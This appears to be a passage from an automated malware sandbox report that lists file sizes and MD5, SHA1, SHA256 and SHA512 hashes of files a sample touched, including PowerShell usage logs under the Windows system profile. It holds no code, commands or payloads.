SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9.9MB
MD580b0b41decb53a01e8c87def18400267
SHA1885f327c4e91065486137ca96105190f7a29d0f9
SHA25610d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA51219bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e
-
Filesize
9.9MB
MD580b0b41decb53a01e8c87def18400267
SHA1885f327c4e91065486137ca96105190f7a29d0f9
SHA25610d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA51219bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e
-
Filesize
9.9MB
MD580b0b41decb53a01e8c87def18400267
SHA1885f327c4e91065486137ca96105190f7a29d0f9
SHA25610d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA51219bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e
-
Filesize
3KB
MD52d29fd3ae57f422e2b2121141dc82253
SHA1c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA25680a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5